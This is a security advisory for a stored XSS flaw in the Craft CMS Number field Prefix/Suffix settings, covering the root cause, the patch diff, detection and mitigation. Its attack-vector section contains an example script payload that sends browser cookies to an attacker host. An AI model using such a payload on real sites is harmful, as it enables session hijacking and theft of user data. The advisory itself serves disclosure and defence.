CVE-2026-25496 Overview
CVE-2026-25496 is a stored Cross-Site Scripting (XSS) vulnerability affecting Craft CMS, a popular platform for creating digital experiences. The vulnerability exists in the Number field type settings where the Prefix and Suffix fields are rendered using the |md|raw Twig filter without proper output encoding. This flaw allows attackers with administrative privileges to inject malicious scripts that execute when the Number field is displayed on users' profiles.
Critical Impact
Administrative users can inject persistent malicious scripts through Number field Prefix/Suffix settings, potentially compromising user sessions and data when the field is rendered on profile pages.
Affected Products
- Craft CMS versions 4.0.0-RC1 through 4.16.17
- Craft CMS versions 5.0.0-RC1 through 5.8.21
Discovery Timeline
- 2026-02-09 - CVE-2026-25496 published to NVD
- 2026-02-09 - Last updated in NVD database
Technical Details for CVE-2026-25496
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) stems from improper output encoding in Craft CMS's Number field type component. When administrators configure Number fields, they can specify Prefix and Suffix text values that are displayed alongside the numeric input. These values pass through the Twig templating engine using the |md(inlineOnly=true)|raw filter chain, which renders Markdown content but fails to properly encode HTML entities, allowing embedded JavaScript to execute in users' browsers.
The attack requires administrator-level privileges to configure the malicious field settings, but the payload persists and executes for any user who views a profile containing the affected Number field. This creates a privilege escalation vector where an administrator could potentially capture session tokens or perform actions on behalf of other users, including other administrators.
Root Cause
The root cause is insufficient output encoding in the Twig template file src/templates/_components/fieldtypes/Number/input.twig. The template uses the |md(inlineOnly=true)|raw filter combination to render the Prefix and Suffix values. While the |md filter processes Markdown syntax, the |raw filter marks the output as safe HTML without encoding, allowing any HTML and JavaScript embedded in the original input to render unescaped in the browser context.
Attack Vector
The attack vector is network-based and requires high privileges (administrator access) along with user interaction (victim viewing the affected profile page). An attacker with administrative access to Craft CMS could:
- Navigate to the Number field configuration settings
- Insert malicious JavaScript in the Prefix or Suffix field (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>)
- Save the field configuration
- Wait for users to view profile pages containing the Number field, triggering script execution
The following patch demonstrates the security fix implemented by the Craft CMS team:
<div class="flex">
{% if hasPrefix %}
<div aria-hidden="true">
- {{ prefix|t('site')|md(inlineOnly=true)|raw }}
+ {{ prefix|t('site')|md(inlineOnly=true,encode=true)|raw }}
</div>
{% endif %}
<div>
Source: GitHub Commit Update
The fix adds the encode=true parameter to the md filter, ensuring HTML entities are properly encoded before output, preventing script injection while preserving Markdown rendering functionality.
Detection Methods for CVE-2026-25496
Indicators of Compromise
- Unexpected JavaScript code or HTML tags present in Number field Prefix or Suffix configuration values
- Anomalous outbound network requests originating from user browsers when viewing profile pages
- Audit log entries showing modifications to Number field settings with suspicious content patterns
- User reports of unexpected behavior or redirects when viewing profiles
Detection Strategies
- Implement content security policies (CSP) to detect and block inline script execution
- Monitor Craft CMS audit logs for field configuration changes containing script tags or event handlers
- Deploy web application firewall (WAF) rules to detect XSS patterns in administrative form submissions
- Conduct periodic database audits of field settings tables for malicious content
Monitoring Recommendations
- Enable detailed logging for Craft CMS administrative actions, particularly field configuration changes
- Configure alerts for CSP violation reports that may indicate attempted XSS exploitation
- Monitor for unusual authentication patterns that could suggest session hijacking from XSS attacks
- Review Number field configurations during routine security assessments
How to Mitigate CVE-2026-25496
Immediate Actions Required
- Upgrade Craft CMS 4.x installations to version 4.16.18 or later immediately
- Upgrade Craft CMS 5.x installations to version 5.8.22 or later immediately
- Audit existing Number field configurations for any suspicious Prefix or Suffix values
- Review administrative access logs for unauthorized field configuration changes
Patch Information
The vulnerability is fully remediated in Craft CMS versions 4.16.18 and 5.8.22. The security patch modifies the Number field input template to include proper HTML encoding via the encode=true parameter in the Markdown filter. Detailed information about the fix is available in the GitHub Security Advisory GHSA-9f5h-mmq6-2x78 and the patched release 5.8.22.
Workarounds
- Restrict administrative access to trusted users only until the patch can be applied
- Implement a strict Content Security Policy (CSP) with script-src 'self' to mitigate XSS impact
- Manually audit and sanitize all existing Number field Prefix and Suffix values
- Consider disabling Number field customization features temporarily in high-risk environments
# Example CSP header configuration for nginx
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'none';" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
